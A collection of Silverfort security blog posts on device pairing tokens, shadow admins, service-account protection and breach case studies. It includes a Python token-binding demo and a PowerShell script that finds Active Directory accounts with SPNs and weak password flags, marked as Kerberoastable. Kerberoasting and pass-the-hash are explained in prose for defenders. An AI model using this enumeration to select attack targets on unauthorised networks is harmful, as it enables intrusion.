Consider Samsung Knox. Samsung builds their phones in a way that “blows a fuse” (referred to as the “bit”) if a device is rooted, loaded with a custom OS, or altered in any way beyond its intended usage. You can no longer use a Knox secure container, even after resetting the phone to factory settings, because the physical bit is now “blown.” Now, you might view this as simply a warranty denial tactic, but it is crucial to acknowledge the potential security concerns at the enterprise level. A Samsung phone with the Knox bit still intact means that the device possesses at least the amount of security that Samsung has integrated into its operating system. This means Samsung can implement secure containers on the phone for enterprise solutions.

Let me say that I am not promoting Samsung as a platform or suggesting people switch to it. I simply want to emphasize that Samsung has recognized this as a security measure that people should be aware of. When your device is rooted, jailbroken, or operating on a custom OS, you can no longer guarantee that the security measures put in place are functioning as intended or being appropriately updated. And this is a critical consideration — particularly if your job involves protecting your company’s interests and assets.
Why does this matter? Because security applications on your devices – including Silverfort – need to trust that the device is secure, updated, and does not pose a risk to the enterprise. And the best way to ensure this is by checking whether the device is rooted, jailbroken, or compromised in any way. If any of these conditions are detected, a good security application will not allow the device to be paired.

## The Critical Role Security Tokens Play in Mobile Device Security

Let’s examine the security measures employed when you pair your device. Generating a secure token requires considering multiple aspects of your device, such as the CPU ID, RAM serial number, screen resolution, and other factors. All of these are used to create a unique token for your device. In fact, this token is so unique that if you were to clone your phone and transfer the cloned information to a new device, your security token would not work until you deleted it and re-paired your device. It may be somewhat inconvenient, but this level of security is highly effective. By utilizing all these factors to generate the token, you can be confident that no one can clone your phone and thus compromise your security mechanisms.

This also explains why, when you buy a new phone and restore from a backup, you need to re-enroll your device across the various authenticators available today. In some cases you might not need to re-enroll your device, but this reduces the security measures for the reasons described above.

This information is important to understand because our world relies so heavily on mobile devices. For example, when was the last time you left your house without your mobile device? Mobile device security is more critical than ever, and this is why Silverfort takes a proactive approach to protecting your company’s security.

## Share your feedback!

We’d love to hear what you thought of this article and get your perspective on mobile device security.
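The hardware-bound pairing token described above, as an added illustration that is not Silverfort’s code: the device derives its token key from an enrollment secret plus a fingerprint of constructed sample attributes (CPU ID, RAM serial, screen resolution are placeholders), so a backup restored onto different hardware fails the challenge until it is re-paired.

```python
from __future__ import annotations

import hashlib
import hmac
import json
import secrets

# Constructed sample device attributes, in the spirit of the article's list
# (CPU ID, RAM serial number, screen resolution). Real enrollment would read
# these from the platform; the values here are placeholders.
ORIGINAL_DEVICE = {
    "cpu_id": "CPU-0000-AAAA-1111",
    "ram_serial": "RAM-SN-998877",
    "screen": "1080x2400",
}

# A restored backup carries the app data to new hardware, so the hardware
# identifiers differ while everything the app stored is identical.
CLONED_DEVICE = dict(ORIGINAL_DEVICE, cpu_id="CPU-0000-BBBB-2222",
                     ram_serial="RAM-SN-112233")


def device_fingerprint(attrs: dict) -> bytes:
    """Hash a canonical encoding of the attributes so key order is irrelevant."""
    canonical = json.dumps(attrs, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).digest()


def derive_token_key(device_secret: bytes, attrs: dict) -> bytes:
    """Bind the per-enrollment secret to the hardware it was enrolled on."""
    return hmac.new(device_secret, device_fingerprint(attrs), hashlib.sha256).digest()


class Server:
    """Holds, per enrollment id, the token key the device derived at pairing."""

    def __init__(self) -> None:
        self.enrollments: dict[str, bytes] = {}

    def new_challenge(self) -> bytes:
        return secrets.token_bytes(16)

    def verify(self, enrollment_id: str, challenge: bytes, response: bytes) -> bool:
        key = self.enrollments.get(enrollment_id)
        if key is None:
            return False
        expected = hmac.new(key, challenge, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


class Device:
    """Stores only the enrollment id and secret; the key is re-derived each time."""

    def __init__(self, attrs: dict, enrollment_id: str | None = None,
                 device_secret: bytes | None = None) -> None:
        self.attrs = attrs
        self.enrollment_id = enrollment_id
        self.device_secret = device_secret

    def respond(self, challenge: bytes) -> bytes:
        # Re-deriving from the current hardware is what defeats a clone.
        key = derive_token_key(self.device_secret, self.attrs)
        return hmac.new(key, challenge, hashlib.sha256).digest()


def pair(server: Server, device: Device) -> None:
    """Enroll the device afresh, discarding any previous enrollment it carried."""
    if device.enrollment_id in server.enrollments:
        del server.enrollments[device.enrollment_id]
    device.enrollment_id = secrets.token_hex(8)
    device.device_secret = secrets.token_bytes(32)
    server.enrollments[device.enrollment_id] = derive_token_key(
        device.device_secret, device.attrs)


def authenticate(server: Server, device: Device) -> bool:
    challenge = server.new_challenge()
    return server.verify(device.enrollment_id, challenge, device.respond(challenge))


def clone_scenario() -> tuple[bool, bool, bool]:
    """Original device passes, its restored clone fails, re-pairing the clone passes."""
    server = Server()
    original = Device(ORIGINAL_DEVICE)
    pair(server, original)
    ok_original = authenticate(server, original)
    # The clone has the same enrollment id and secret (restored from backup)
    # but different hardware, so its derived key does not match.
    clone = Device(CLONED_DEVICE, original.enrollment_id, original.device_secret)
    ok_clone = authenticate(server, clone)
    pair(server, clone)  # delete the old enrollment and re-pair, as the article describes
    ok_repaired = authenticate(server, clone)
    return ok_original, ok_clone, ok_repaired


if __name__ == "__main__":
    print(clone_scenario())  # expected: (True, False, True)
```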
---

- Published: 2023-05-24
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-silverfort-protects-against-the-risk-from-shadow-admins/

Shadow admins are one of the key attack surfaces that adversaries regularly take advantage of. The pattern of discovering a user who has been inadvertently assigned high access privileges is all too common in today’s cyber operations. This makes the ability to detect and prevent the abuse of these accounts a top priority for both identity and SecOps teams. In this article we’ll explain in detail how Silverfort’s Identity Threat Detection and Response (ITDR) capabilities enable the quick discovery of existing shadow admin accounts, the ability to monitor for new ones as they appear, and the securing of their access with MFA policies.

## Shadow admins recap: what they are and what risks they introduce

Shadow admins are user accounts that either have admin access or have a way to achieve it while not actually being part of a documented admin group. As such, neither Identity nor Security teams are aware of their existence, and therefore don’t apply to them the standard monitoring and protection that all admin accounts require. The most common example of this is user accounts that have the privilege of resetting the password of admin users. If an adversary gains control of this type of account, they will then be able to use it to reset the passwords of admins and abuse the accompanying high level of privilege to access resources at will. For a detailed explanation of shadow admins, read this article.

## Silverfort shadow admin protection overview

Silverfort enables Identity and SecOps teams to easily discover shadow admins in their environments and either delete them or remove their redundant permissions.
In addition, teams have the ability to continuously monitor for the emergence of new shadow admin accounts, as well as to take proactive protection steps against any attempt by a shadow admin account to gain access to a specific resource, going as granular as enforcing MFA policies on password reset attempts by shadow admins. These protections are equally effective both for accounts that were inadvertently assigned higher privilege access and against any account manipulation that adversaries might perform that modifies the account’s original permissions and privileges.

Let’s see exactly how this is done in Silverfort’s console:

## Discovery and removal of shadow admins

Purpose: eliminate all present shadow admins

In Silverfort’s Threat Detection screen, under the Attack Surface Management section, search for Shadow Admins. In this example there are two of these.

Screen shot #1: discovering shadow admins in the Threat Detection screen

Clicking on the Shadow Admins space opens a window that shows you full details on these accounts.

Screen shot #2: discovering who these shadow admins are

Now that we have the names of these shadow admins, we can locate them in Active Directory and either remove their extra permissions or delete them altogether.

## Continuous monitoring of shadow admins

Purpose: detect new shadow admins as soon as they appear

On Silverfort’s Authentication Logs screen, add a Risk Indicator filter and check Shadow Admins.

Screen shot #3: filtering for shadow admins in the logs screen

Click Apply and then adjust the time range to fit your monitoring cadence. This will show you all shadow admins that have been added to the environment within this timeframe.

Screen shot #4: discovering newly created shadow admins

Following the discovery, you can click the investigation icon of each account to see exactly which resources it has attempted to access since its creation.
Screen shot #5: investigating a shadow admin account’s activity

Next, you can proceed to either delete the account or downgrade its permissions, similar to what’s been described in the section on discovery and removal of shadow admins.

## Risk prevention #1: MFA on all shadow admin access

Purpose: prevent shadow admins from connecting to resources without explicit user verification

On Silverfort’s Policies screen, create a new policy. Check Active Directory as the Auth Type and then check either Kerberos/NTLM or LDAP, depending on your needs (or if both are required, create two policies). Choose Risk Based for the policy type and have it triggered by Risk Indicator. In the Risk Indicators box, check Shadow Admin.

Screen shot #6: MFA policy to prevent shadow admins’ access

Once enabled, this policy will enforce MFA verification of any account that Silverfort’s risk engine identifies as a shadow admin. If this account were to become compromised, this policy would deprive an adversary of the ability to use it for malicious access. Silverfort is the only solution that can extend MFA protection to this type of authentication.

## Risk prevention #2: MFA on shadow admin password reset attempt

Purpose: prevent adversaries from using a shadow admin to reset the password of other accounts

As mentioned earlier, the use of a shadow admin to reset the password of additional admin accounts with higher access privileges is a common tactic of threat actors. Silverfort enables users to mitigate this risk in the following way:

In Silverfort’s Policies screen, create a new policy. Check Active Directory as the Auth Type, then check Kerberos/NTLM, choose Risk Based as the policy type, then check the Shadow Admin risk indicator. In the Destination field, instead of placing names or groups of machines as in the former policy, choose krbtgt. This will apply the policy to any access attempt to the krbtgt account within the domain controllers in the environment.
Screen shot #7: MFA policy for shadow admin password reset – choosing krbtgt as destination

After choosing krbtgt as the destination, click on it to display the list of services. Check kadmin/changepw and leave the others blank. (This is the service that performs the password reset.)

Screen shot #8: MFA policy for shadow admin password reset – choosing kadmin/changepw as destination

Enabling the policy will now trigger MFA whenever any account Silverfort has marked as a shadow admin attempts to reset another account’s password — fully mitigating this risk. Silverfort is the only solution that can extend MFA protection to this type of authentication.

## Automated discovery and real-time protection are the keys to mitigating the risk of shadow admins

Silverfort’s protection against the malicious use of shadow admins is part of its vision of how identity protection should be designed and practiced. Silverfort is the first solution that provides end-to-end ITDR capabilities across Active Directory environments. By applying continuous monitoring, risk analysis, and active policy enforcement on every authentication and access attempt, Silverfort can both automate the discovery of shadow admins and deliver real-time protection against their abuse.

Looking to solve shadow admin challenges in your environment? Reach out to one of our experts here.

---

- Published: 2023-05-18
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/applying-service-accounts-security-best-practices-with-silverfort/

Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments, are used by various business applications, and are typically forgotten about and left unsupervised. This means that in most organizations nobody is tracking their use or validating that they are not compromised or used by malicious actors.
On top of managing these accounts, organizations often lack full visibility into service accounts and how they’re being used, which is why these accounts are seen as low-hanging fruit for threat actors. However, service account management is a critical task that should not be overlooked, as service accounts often have privileged access and are used by applications, scripts, and services to authenticate and interact with various systems and resources. If service account management is overlooked, malicious actors with access to compromised service accounts can carry out malicious activities such as lateral movement.

In this post, we will explain how Silverfort enables you to manage your service accounts easily, through automated detection, monitoring, and protection. As a result, Silverfort is able to provide full visibility, risk analysis, and adaptive access policies for service accounts without the need for password rotation.

## Best Practices for Service Accounts Protection

While service accounts can be associated with an owner and their activities should be continuously monitored, they should not have the same privileges as a regular user account. This means that service accounts should not have interactive user interface privileges or the ability to operate as normal users.

By implementing Silverfort’s Unified Identity Protection platform, organizations can apply best practices to get their management of service accounts under control. This involves a three-step approach:

- Discover all service accounts
- Monitor activity and risk analysis
- Analyze and enable access policies

With these capabilities implemented, service account management is no longer a nightmare, and, at the same time, the risk of security breaches caused by mismanaged service accounts is dramatically reduced. Here are more details on Silverfort’s three-step approach:

## 1. Discovery

The first step to properly managing and protecting all service accounts is knowing exactly where they reside.
Here are several key questions to ask:

- What service accounts do you have?
- What is the total number of service accounts?
- Which assets use those service accounts?

Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info.

This is done when an organization connects its domain controllers to Silverfort. Silverfort is then able to automatically identify all service accounts, providing complete visibility into their behavior patterns. This is because, as machine accounts, service accounts display predictable behavior patterns, allowing Silverfort to identify and categorize them automatically. Silverfort identifies and categorizes three main types of service accounts:

- Machine to Machine (M2M) Accounts – defined on Active Directory (AD) or another user repository
- Hybrid Accounts – used by both users and machines
- Scanners – used by a few devices to communicate with a large number of resources inside a network

Silverfort can also quickly identify any accounts that follow common service account naming conventions (e.g. “admin” or “svc”), as well as any custom naming conventions that may be used by the organization.

Because Silverfort can detect all machine-like behavioral patterns, it can also flag whether an account is also being used by a human user and alert on this bad practice. Silverfort detects the erratic patterns associated with human user activities that do not correlate with the machine’s behavior patterns and alerts on the irregular activity of the service account.

## 2. Monitoring & Risk Analysis

The next and continuous phase is monitoring all service account activity and associated risks. Now that there is a complete picture with full visibility into all service account details and behavior, Silverfort constantly monitors and audits their use.

Silverfort’s Investigation screen shows various insights into a specific service account’s activity.
Silverfort can identify different configurations and behaviors of service accounts, such as high-level permissions, broad use, repetitive behavior, etc. Silverfort then adds risk analysis and a level of predictability to each service account to enable administrators to better understand the degree to which specific service accounts are at risk. By continuously monitoring all authentication and access activity, Silverfort can assess the risk of every authentication attempt and thus immediately detect any suspicious behaviors or anomalies, providing SOC teams with actionable insights into overall service account activity.

## The importance of monitoring and auditing

Active monitoring and auditing are crucial components of service account management. By keeping a close eye on the activities of these accounts, organizations can swiftly detect any suspicious behavior and take necessary action to prevent potential breaches.

### Active Monitoring and Anomaly Detection

Active monitoring involves continuously tracking and analyzing the activities of service accounts to identify any deviations from normal behavior patterns. This could be an unusually high number of failed login attempts, modifications to account privileges, or changes in login locations or times. By setting up automated alert systems, organizations can be notified of such anomalies in real time, enabling them to respond promptly to potential threats.

### Auditing and Authentication Monitoring

The purpose of auditing is to ensure compliance with organizational policies and regulatory requirements by conducting periodic reviews of service account activities. Authentication monitoring, on the other hand, focuses on verifying the identities of the users attempting to access service accounts. Both these measures help in maintaining accountability and enhancing the overall security of service accounts.

## Visibility and Auditing Challenges

Managing service accounts comes with numerous visibility and auditing challenges.
Without proper tools and processes in place, it can be difficult to keep track of all service accounts within an organization, especially in large-scale environments with hundreds or even thousands of accounts.

### Dormant and Forgotten Service Accounts

One common issue is the existence of dormant or forgotten service accounts. These are accounts that have been created for a particular purpose but are no longer in use, either because the project they were associated with has ended, or because the employee who created them has left the organization. These dormant accounts can pose a serious security risk, as they could be exploited by malicious actors to gain unauthorized access to the system. Therefore, it’s important to regularly audit service accounts and deactivate any that are no longer needed.

### Sharing of Service Account Credentials

While sharing credentials across services may seem convenient, it significantly increases the risk of a security breach. If the credentials are compromised, all services using those credentials become vulnerable. To mitigate this risk, each service should have its own dedicated service account with unique credentials.

## 3. Analyze & Access Policies

Once full visibility and insight into all service accounts are achieved, the next phase is to analyze these insights and create access policies to provide a digital fence for these non-human accounts.

Silverfort displays a list of sources and destinations using the service accounts, as well as the number of hits (authentications).

Silverfort enables admins to analyze their service accounts’ insights to identify certain service account behaviors. Silverfort shows the number of hits per source and destination. This helps admins prioritize the different sources and destinations that their service accounts connect to, ensuring they are properly monitored and protected.

With the help of Silverfort, admins examine the service account behavior using one of the following methods:

1. Understand which accounts are used by the crown-jewel applications and analyze these service accounts.
2. Analyze the critical-risk-level accounts and then work down the chain to the lower risk levels (using the risk levels provided by Silverfort).
3. Analyze and prioritize the service accounts with high privileges, then continue to the accounts that are broadly used, and finish with accounts with interactive logins.

After analyzing the service accounts, Silverfort automatically recommends specifically tailored policies for each service account. Each security policy is formulated to lower the network risk level without blocking the traffic, while tracking policy violations. This focuses on monitoring the traffic and allows the admin to make sure that the created policy is complete without impacting the traffic.

Silverfort has three types of authentication policies for service accounts:

- Block access
- Alert to SIEM
- Alert

For each policy created with Silverfort, administrators can choose sources, destinations, authentication protocols, when policies should be applied, and what actions the system should take in case of a deviation. In the case of an organization with a large number of service accounts, Silverfort allows admins to create general policies that can be assigned to multiple service accounts. This can be done by using Silverfort’s recommended policies.

Once policies have been created for all service accounts with Silverfort, admins can simply enable and automatically enforce these policies without the need to make any changes to applications, change passwords, or make use of any proxies. With complete visibility into these accounts and the ability to proactively protect service accounts with access policies, organizations will now be well equipped to reduce the attack surface presented by compromised service accounts.
## Learn More About Silverfort’s Service Account Protection

The alarming reality of service account compromises cannot be ignored, as they continue to occur regularly and have been instrumental in major, high-profile cyberattacks. These incidents serve as stark reminders of the critical importance of securing service accounts and implementing robust protective measures. Compromised service accounts have emerged as a preferred target for malicious actors due to their elevated privileges and widespread access within organizations. These accounts often hold the keys to the kingdom, granting unauthorized malicious actors entry to sensitive data, critical systems, and confidential resources.

To address this, organizations must prioritize the implementation of service account security best practices such as strong authentication, regular monitoring, and deploying strict access policies. By prioritizing service account security, organizations can mitigate the risk of compromised service accounts being deployed by malicious actors in cyber attacks.

Interested in seeing how Silverfort can help you to discover, monitor, and protect service accounts? Request a demo here.

---

- Published: 2023-05-11
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/3-cyberattacks-in-which-compromised-service-accounts-played-a-key-role/

Securing service accounts is a notoriously difficult task. One of the main reasons for this difficulty is that service accounts are often forgotten about and left unsupervised, resulting in no one tracking their use or validating that they aren’t compromised and used by malicious actors. Additionally, having limited to zero visibility into these accounts is a key challenge when it comes to securing service accounts. The lack of visibility into service accounts also makes them an attractive target for threat actors.
These accounts can be used to gain unauthorized access to sensitive data, systems, and resources and, in many cases, to move laterally across an organization’s environment. The consequences of a successful attack on a service account can be severe, including data theft, system compromise, and even complete network takeovers. In this post, we’ll explore the specific attack techniques threat actors utilize when targeting service accounts and highlight a few well-known data breaches where service accounts were compromised and helped attackers move laterally.

## Attack Methods Used to Compromise and Use Service Accounts

Threat actors implement different techniques to compromise and use service accounts. Let’s take a closer look at the most commonly used identity-based attack methods and how specifically they take aim at service accounts.

### Brute Force

A brute force attack is the most common method used by threat actors, where attempts are made to guess a password or encryption key by trying all possible combinations of characters until the correct one is found. This method is particularly effective against weak or easily guessable passwords. Threat actors commonly use automated tools to rapidly try different passwords until they find one that works. Threat actors will often use brute-force attacks to compromise service accounts that have weak passwords or no password policies, sometimes also attempting to bypass the security measures in place to protect against these types of attacks.

### Kerberoasting

A Kerberoasting attack is a type of attack that targets the Kerberos authentication protocol to obtain the password hash of Active Directory user accounts that have Service Principal Name (SPN) values — such as service accounts. The threat actor first identifies the targeted users that have SPNs associated with them. They then request a Kerberos service ticket for a specific SPN associated with a user account. The service ticket is encrypted using the user’s hash.
Next, the threat actor is able to recover the hash itself via offline cracking and reproduce the original plaintext password. Service accounts are often targeted because they frequently have SPNs associated with them, which is what makes their service tickets requestable in the first place.

### Pass-The-Hash

In a pass-the-hash attack, the threat actor can use a password hash to perform an NTLM authentication to other systems or services on the network without needing to know the actual password. To carry out a pass-the-hash attack, the threat actor first obtains the service account’s password hash by either extracting it from a compromised endpoint’s memory or by intercepting the service account’s authentication traffic.

## Notorious Cyber Attacks That Used Compromised Service Accounts

In recent years, there have been several high-profile data breaches where service accounts were successfully compromised by threat actors. These attacks are clear examples of how threat actors target and use compromised service accounts to move laterally. By understanding these cases, we can gain a better appreciation of the risks associated with unsecured service accounts and the measures organizations can take to mitigate those risks.

### SolarWinds

The SolarWinds attack was a supply chain attack disclosed in December 2020. Threat actors compromised the SolarWinds Orion IT management platform build process and inserted a malicious backdoor into the codebase. This backdoor was then distributed to numerous organizations via legitimate software updates. Once installed on the target networks, the backdoor provided the threat actors with persistent access to the target systems, allowing them to exfiltrate data and move laterally within the networks.

#### How Service Accounts Were Involved

Service accounts played a crucial role in the SolarWinds attack. Compromised service accounts were used by the threat actors to move laterally through the targeted networks and access their resources.
The threat actors targeted service accounts with high-level privileges, which allowed them to gain access to critical systems and data. Once the threat actors gained access to the SolarWinds Orion IT management platform, they were able to obtain the credentials for several SolarWinds service accounts. Once these accounts were compromised, the threat actors used the SolarWinds service accounts to move laterally through the network until reaching the ADFS server.

### US Office of Personnel Management

The data breach of the United States Office of Personnel Management (OPM) was discovered in June 2015. This was a classic example of a state-sponsored cyber-espionage operation by a Chinese advanced persistent threat (APT). The OPM breach was facilitated by several technical and architectural gaps in the agency’s IT infrastructure, where threat actors were able to gain access to OPM’s systems using stolen credentials belonging to a third-party contractor who had privileged access to their network.

#### How Service Accounts Were Involved

The attackers initially gained access to the OPM network through a spear-phishing email, which allowed them to obtain the credentials of several OPM contractors. Once inside the network, the threat actors used the compromised credentials to gain access to several service accounts, including the KeyPoint Government Solutions (KGS) contractor’s service account. This account had high-level privileges and was used to manage and administer critical OPM systems. The threat actors used the KGS contractor’s service account to move laterally through the network and access sensitive data, including the background investigation records of millions of current and former federal employees. The threat actors were able to exfiltrate this data over several months, during which time they remained undetected.
They also used the service accounts to create backdoors on the network, which allowed them to maintain access to the network even after the initial breach had been detected.

### Marriott

Disclosed in 2018, the Marriott attack was one of the largest data breaches on record. Threat actors gained access to the company’s systems through a third-party vendor who had access to Marriott’s reservations database. Once inside the network, they were able to move laterally and escalate privileges in Marriott’s Active Directory infrastructure. After gaining access, the threat actors installed malware, which was used to steal data over several years. The breach went undetected for months, giving the threat actors ample time to steal large amounts of data.

#### How Service Accounts Were Involved

Threat actors were able to obtain the credentials of two privileged service accounts with domain-level admin access. They deployed a pass-the-hash attack, using the stolen password hashes to compromise service accounts with high-level privileges and access Marriott’s Starwood reservation system, which contained the sensitive personal and financial information of millions of guests. These service accounts had access to sensitive systems and data across the Marriott network, and their compromise allowed the attackers to move laterally through the network and escalate their privileges over an extended period of time, without being detected by Marriott’s security controls.

## The Common Thread: Service Account Compromise

In each of these cases, threat actors were able to gain unauthorized access to sensitive systems or data by using compromised service accounts to move laterally across their victim’s network. These breaches highlight the importance of properly managing and securing service accounts to prevent unauthorized access and reduce the risk of breaches.
## Next Up: Securing Service Accounts with Silverfort

Now that we’ve discussed attack methods used by threat actors when targeting service accounts and highlighted high-profile breaches where service accounts were involved, our next post will show how Silverfort helps organizations discover, monitor, and protect service accounts by providing full visibility, risk analysis, and adaptive access policies without the need for password rotation.

---

- Published: 2023-05-06
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-to-find-service-accounts-in-active-directory/

Service accounts are a critical component of any enterprise environment, used to perform a variety of automated processes. However, these accounts can pose a significant security risk if not properly managed and monitored. In this article, we will explore how to find service accounts in Active Directory (AD) and discuss how Silverfort’s solutions can help enhance your security posture.

## Understanding Service Accounts

Service accounts are special types of accounts in Active Directory that provide a security context for services running on a server. These accounts have unique permissions and privileges that allow them to perform specific tasks. However, due to their elevated access privileges, they can become prime targets for attackers if left unmonitored or unprotected.

Service accounts are typically used to run scripts, manage applications, or perform other automated functions. Unlike regular user accounts, service accounts are not associated with any specific individual but rather serve as a means for services and applications to interact with the network. They are designed to operate in the background without requiring human intervention. Because service accounts have elevated access privileges, they are prime targets for attackers.
Therefore, it is essential to ensure that service accounts are adequately protected and that their activities are closely monitored to prevent potential security breaches.

Finding Service Accounts in Active Directory

Finding service accounts in Active Directory can be a complex task given the number of accounts and the intricate nature of AD structures, but it is an essential step in securing your network. To find service accounts in Active Directory, follow these steps:

Review the documentation: Start by reviewing any existing documentation or inventory lists that may contain information about service accounts, such as names, descriptions, and associated applications or scripts.

Use Active Directory tools: Use the built-in Active Directory tools to search for service accounts. One commonly used tool is the Active Directory Users and Computers (ADUC) console. Open ADUC, navigate to your domain, and use the search feature to filter for accounts with attributes commonly associated with service accounts, such as "ServiceAccount" in the description field or a name prefixed with "svc". A stronger indicator is a populated servicePrincipalName attribute: an account with an SPN runs a Kerberos service, and because any domain user can request a service ticket for it, these are also the accounts exposed to Kerberoasting. Note that group Managed Service Accounts and standalone Managed Service Accounts are separate object classes (msDS-GroupManagedServiceAccount and msDS-ManagedServiceAccount) and do not show up in searches for user objects; list them separately with Get-ADServiceAccount.

Check for special account flags: Service accounts often have userAccountControl flags set that hint at their purpose, such as DONT_EXPIRE_PASSWORD (0x10000, shown in ADUC as "Password never expires") or PASSWD_NOTREQD (0x20, "Password not required"). You can use PowerShell commands or LDAP queries to search for accounts with these flags.

Examine group membership: Service accounts are frequently members of security groups that grant them the permissions they need. Review the membership of groups like "Domain Admins," "Enterprise Admins," or other groups known to have elevated privileges, and resolve nested group membership so that indirect members are not missed.

Monitor application dependencies: Identify applications or services that rely on service accounts to function properly. Consult with application owners or system administrators to gather information about the associated service accounts.
Audit event logs: Regularly monitor event logs on domain controllers and other critical servers for events related to service accounts. Look for logon events (for example, event ID 4624 with logon type 5 for service logons, or 4672 when an account is assigned special privileges), password changes, or other activities that indicate a service account is in use.

Remember, in addition to taking an inventory of service accounts, it's crucial to regularly review and update their permissions, enforce strong password policies, and monitor their activities to ensure the security of your Active Directory environment. By taking these steps, you can mitigate the risks associated with service accounts and strengthen your overall security posture.

Silverfort's Solution: Automated Discovery and Monitoring

Silverfort offers an automated solution for discovering and monitoring service accounts within your environment. Through its native integration with Active Directory, Silverfort can analyze every access attempt, regardless of the authentication protocol used. This means that Silverfort can automatically identify any account that exhibits predictable and repetitive behavior, classify it as a service account, and protect it with access policies. As a result, any deviation from the standard activity of a service account can trigger an action such as blocking access to the targeted resource, adding an extra layer of protection. This type of "virtual fencing" means that service accounts can be fully protected from misuse by threat actors.

Conclusion

In today's complex cybersecurity landscape, managing and protecting service accounts in Active Directory is crucial. Silverfort's automated discovery, activity monitoring, and access policy creation for all service accounts within the environment provides a comprehensive solution, so organizations can be confident that their service accounts are secure, reducing the risk of breaches and enhancing overall network security.
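The discovery procedure in this post, as an added PowerShell example that is not code from the original post or from Silverfort. The scoring function is pure and runs offline against the constructed sample objects at the bottom; Find-ServiceAccountCandidates is the live query and needs the RSAT ActiveDirectory module on a domain-joined host. The privileged group names, the "svc"/"sa" name prefixes and the sample account data are assumptions to adjust for your environment.

```powershell
# Added example (not code from the original post): score Active Directory user
# objects on the service-account indicators listed above (SPN, password flags,
# naming convention, description, privileged group membership).

# userAccountControl bits (Microsoft-documented values).
$DONT_EXPIRE_PASSWORD = 65536   # 0x10000, "Password never expires"
$PASSWD_NOTREQD       = 32      # 0x20,    "Password not required"
$LDAP_MATCHING_RULE_BIT_AND = '1.2.840.113556.1.4.803'

function Get-ServiceAccountIndicators {
    # Scores one account object (Get-ADUser output or a look-alike) and
    # returns the reasons it looks like a service account.
    param(
        [Parameter(Mandatory)] $Account,
        [string[]] $PrivilegedMemberDNs = @()   # DNs that are (recursively) in privileged groups
    )
    $reasons = [System.Collections.Generic.List[string]]::new()
    $score   = 0

    # An SPN means the account runs a Kerberos service and any domain user can
    # request a ticket encrypted with its password hash (Kerberoasting), so it
    # is the strongest indicator and weighs double.
    if (@($Account.ServicePrincipalName | Where-Object { $_ }).Count -gt 0) {
        $reasons.Add('has SPN (Kerberoastable)'); $score += 2
    }
    if ($Account.PasswordNeverExpires) { $reasons.Add('DONT_EXPIRE_PASSWORD'); $score += 1 }
    if ($Account.PasswordNotRequired)  { $reasons.Add('PASSWD_NOTREQD');       $score += 1 }
    if ($Account.SamAccountName -match '^(svc|sa)[-_]') { $reasons.Add('service naming convention'); $score += 1 }
    if ($Account.Description -match 'service\s*account')  { $reasons.Add('description says service account'); $score += 1 }
    $privileged = $PrivilegedMemberDNs -contains $Account.DistinguishedName
    if ($privileged) { $reasons.Add('member of privileged group'); $score += 1 }

    [pscustomobject]@{
        SamAccountName = $Account.SamAccountName
        Score          = $score
        Privileged     = $privileged
        Enabled        = $Account.Enabled
        Reasons        = ($reasons -join '; ')
    }
}

function Find-ServiceAccountCandidates {
    # Live query: pull only accounts that trip at least one indicator, then score them.
    param([string[]] $PrivilegedGroups = @('Domain Admins', 'Enterprise Admins', 'Administrators'))
    Import-Module ActiveDirectory -ErrorAction Stop

    $ldap = "(&(objectCategory=person)(objectClass=user)(|" +
            "(servicePrincipalName=*)" +
            "(userAccountControl:${LDAP_MATCHING_RULE_BIT_AND}:=$DONT_EXPIRE_PASSWORD)" +
            "(userAccountControl:${LDAP_MATCHING_RULE_BIT_AND}:=$PASSWD_NOTREQD)" +
            "(sAMAccountName=svc*)(description=*service*account*)))"
    $props = 'servicePrincipalName', 'PasswordNeverExpires', 'PasswordNotRequired', 'Description', 'LastLogonDate'
    $users = Get-ADUser -LDAPFilter $ldap -Properties $props

    # Resolve membership recursively so accounts in nested groups are not missed.
    $privDNs = foreach ($g in $PrivilegedGroups) {
        (Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue).DistinguishedName
    }

    $users | ForEach-Object { Get-ServiceAccountIndicators -Account $_ -PrivilegedMemberDNs @($privDNs) } |
        Sort-Object Score -Descending
    # Managed service accounts are separate object classes and never appear in
    # Get-ADUser output; enumerate them with: Get-ADServiceAccount -Filter *
}

# Constructed sample objects standing in for Get-ADUser output (offline demo).
$sample = @(
    [pscustomobject]@{ SamAccountName = 'svc_sql'; DistinguishedName = 'CN=svc_sql,OU=Service,DC=corp,DC=example'
                       ServicePrincipalName = @('MSSQLSvc/db01.corp.example:1433'); PasswordNeverExpires = $true
                       PasswordNotRequired = $false; Description = 'SQL Server service account'; Enabled = $true }
    [pscustomobject]@{ SamAccountName = 'backup01'; DistinguishedName = 'CN=backup01,OU=Legacy,DC=corp,DC=example'
                       ServicePrincipalName = @(); PasswordNeverExpires = $false
                       PasswordNotRequired = $true; Description = 'Nightly backup job'; Enabled = $true }
    [pscustomobject]@{ SamAccountName = 'jdoe'; DistinguishedName = 'CN=jdoe,OU=Staff,DC=corp,DC=example'
                       ServicePrincipalName = @(); PasswordNeverExpires = $false
                       PasswordNotRequired = $false; Description = 'Finance analyst'; Enabled = $true }
)
# Constructed: svc_sql sits in Domain Admins, the other two do not.
$privilegedDNs = @('CN=svc_sql,OU=Service,DC=corp,DC=example')
$sample | ForEach-Object { Get-ServiceAccountIndicators -Account $_ -PrivilegedMemberDNs $privilegedDNs } |
    Sort-Object Score -Descending | Format-Table -AutoSize
```

The LDAP filter uses the bitwise-AND matching rule so the password flags are tested directly on userAccountControl rather than post-filtered in PowerShell, which matters in a domain with tens of thousands of users. Accounts that score on both the SPN and the privileged-group indicators are the ones to deal with first: they can be Kerberoasted by any domain user and the resulting credential is a domain-admin credential.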
---
- Published: 2023-05-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/the-security-risks-of-service-accounts-you-cant-protect-what-you-cant-see/

